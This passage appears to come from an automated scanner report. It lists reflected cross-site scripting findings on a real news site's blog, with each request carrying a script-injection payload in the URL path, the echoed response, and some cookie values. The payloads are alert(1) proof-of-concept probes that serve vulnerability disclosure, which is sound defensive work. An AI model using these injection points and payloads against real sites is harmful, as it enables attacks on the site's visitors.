Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69523

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js52af9"><script>alert(1)</script>873102b4d8f" />
...[SNIP]...

1.114. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/audio-player/assets/audio-player.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa9ca"%3balert(1)//678e5566e0f was submitted in the REST URL parameter 6. This input was echoed as fa9ca";alert(1)//678e5566e0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/audio-player/assets/audio-player.jsfa9ca"%3balert(1)//678e5566e0f?ver=2.0.4.1 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69785

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.jsfa9ca";alert(1)//678e5566e0f","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.115. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33e51"%3balert(1)//000cbdc337f was submitted in the REST URL parameter 5. This input was echoed as 33e51";alert(1)//000cbdc337f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js33e51"%3balert(1)//000cbdc337f?ver=3.0.4 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69745

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
s:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js33e51";alert(1)//000cbdc337f","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.116. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3b42"><script>alert(1)</script>3113957a202 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/dmr-tweets/jquery.tweet.jsc3b42"><script>alert(1)</script>3113957a202?ver=3.0.4 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69483

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.jsc3b42"><script>alert(1)</script>3113957a202" />
...[SNIP]...

1.117. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32dec"%3balert(1)//9a97554e736 was submitted in the REST URL parameter 6. This input was echoed as 32dec";alert(1)//9a97554e736 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css32dec"%3balert(1)//9a97554e736?ver=1.0.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69775

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css32dec";alert(1)//9a97554e736","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.118. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b88e4"><script>alert(1)</script>22ba7e59903 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/css/nggallery.cssb88e4"><script>alert(1)</script>22ba7e59903?ver=1.0.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69513

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.cssb88e4"><script>alert(1)</script>22ba7e59903" />
...[SNIP]...

1.119. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5488"><script>alert(1)</script>683302c7758 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.cssc5488"><script>alert(1)</script>683302c7758?ver=1.3.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69557

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.cssc5488"><script>alert(1)</script>683302c7758" />
...[SNIP]...

1.120. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe488"%3balert(1)//e8899a6b1a0 was submitted in the REST URL parameter 6. This input was echoed as fe488";alert(1)//e8899a6b1a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.cssfe488"%3balert(1)//e8899a6b1a0?ver=1.3.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69819

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
ript'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.cssfe488";alert(1)//e8899a6b1a0","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.121. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dfeb"><script>alert(1)</script>1d5781cdb1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js3dfeb"><script>alert(1)</script>1d5781cdb1?ver=1.3.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69887

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js3dfeb"><script>alert(1)</script>1d5781cdb1" />
...[SNIP]...

1.122. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dda02"%3balert(1)//835bdff0c58 was submitted in the REST URL parameter 6. This input was echoed as dda02";alert(1)//835bdff0c58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.jsdda02"%3balert(1)//835bdff0c58?ver=1.3.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
cript'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.jsdda02";alert(1)//835bdff0c58","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.123. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/wp-email/email-css.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51ec4"%3balert(1)//2ac9bdf6711 was submitted in the REST URL parameter 5. This input was echoed as 51ec4";alert(1)//2ac9bdf6711 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/wp-email/email-css.css51ec4"%3balert(1)//2ac9bdf6711?ver=2.50 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69390

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
uires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css51ec4";alert(1)//2ac9bdf6711","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.124. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/wp-email/email-css.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e743e"><script>alert(1)</script>045c9ac9fe9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/wp-email/email-css.csse743e"><script>alert(1)</script>045c9ac9fe9?ver=2.50 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69466

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.csse743e"><script>alert(1)</script>045c9ac9fe9" />
...[SNIP]...

1.125. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4b81"%3balert(1)//ea5f78fe07a was submitted in the REST URL parameter 6. This input was echoed as d4b81";alert(1)//ea5f78fe07a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/legacy/GDN/UAWidgets/LoggedOut.jsd4b81"%3balert(1)//ea5f78fe07a HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:36:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69717

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
quires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.jsd4b81";alert(1)//ea5f78fe07a","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.126. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 291b0"><script>alert(1)</script>9616e98d8c6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js291b0"><script>alert(1)</script>9616e98d8c6 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:36:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69793

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js291b0"><script>alert(1)</script>9616e98d8c6" />
...[SNIP]...

1.127. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /odygel/lib/userauth/content/login.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60f8e"><script>alert(1)</script>917b1fb18f2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

